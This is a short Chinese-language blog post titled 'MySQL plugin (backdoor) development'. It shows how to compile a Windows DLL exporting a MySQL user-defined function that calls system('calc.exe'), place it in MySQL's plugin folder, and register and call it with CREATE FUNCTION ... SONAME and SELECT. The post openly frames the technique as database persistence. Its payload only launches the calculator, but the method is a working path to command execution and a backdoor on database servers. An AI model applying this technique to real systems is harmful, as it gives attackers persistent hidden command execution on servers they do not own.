mysql插件(后门)开发

  1. 0x00前言
  2. 0x01正文
  3. 0x02参考链接

0x00前言

早上看到某文章讲数据库维权。此时,群内某dalao发话表示,用dll做插件加载也可以(滑稽)。那么下午弄个来康康

0x01正文

环境:

VS2015
Mysql头部文件

mysql头部文件下载:MySQL :: Download MySQL Connector/C (Archived Versions)

创建一个静态DLL项目,然后引用外部文件(mysql-connector-c-6.1.11-winx64\include)

将mysql-connector-c-6.1.11-winx64\lib文件夹下的libmysql.lib和libmysql.dll复制到项目根目录

引用lib,导入mysql.h开始写即可

// ConsoleApplication1.cpp : 定义 DLL 应用程序的导出函数。
//

#include "stdafx.h"
#include <mysql.h>
#pragma comment(lib,"libmysql") //引用lib文件

extern "C" {
    __declspec(dllexport) void udf_test() {
        system("calc.exe");
    }

    __declspec(dllexport) my_bool udf_test_init() { //创建一个函数后要创建对应的 "函数名_init()"函数,不软会报错,如error.jpg
        return 0;
    }
}

error.jpg

编译环境选择Release x86,根据本机的环境不同而选择。如果x86生成出的dll加载错误就用x64生成在加载

将生成的dll放入mysql的\lib\plugin文件夹下

自定义一个函数,和dll里相同的函数。在调用即可弹出calc

CREATE FUNCTION udf_test RETURNS INTEGER SONAME "dc.dll";
select udf_test();

0x02参考链接

mysql函数扩展之UDF开发
windows+vs2017+C语言 引入mysql.h对MYSQL数据库的操作


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。

文章标题:mysql插件(后门)开发

本文作者:九世

发布时间:2019-12-03, 17:49:21

最后更新:2019-12-03, 18:16:10

原始链接:http://422926799.github.io/posts/657d3c49.html

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录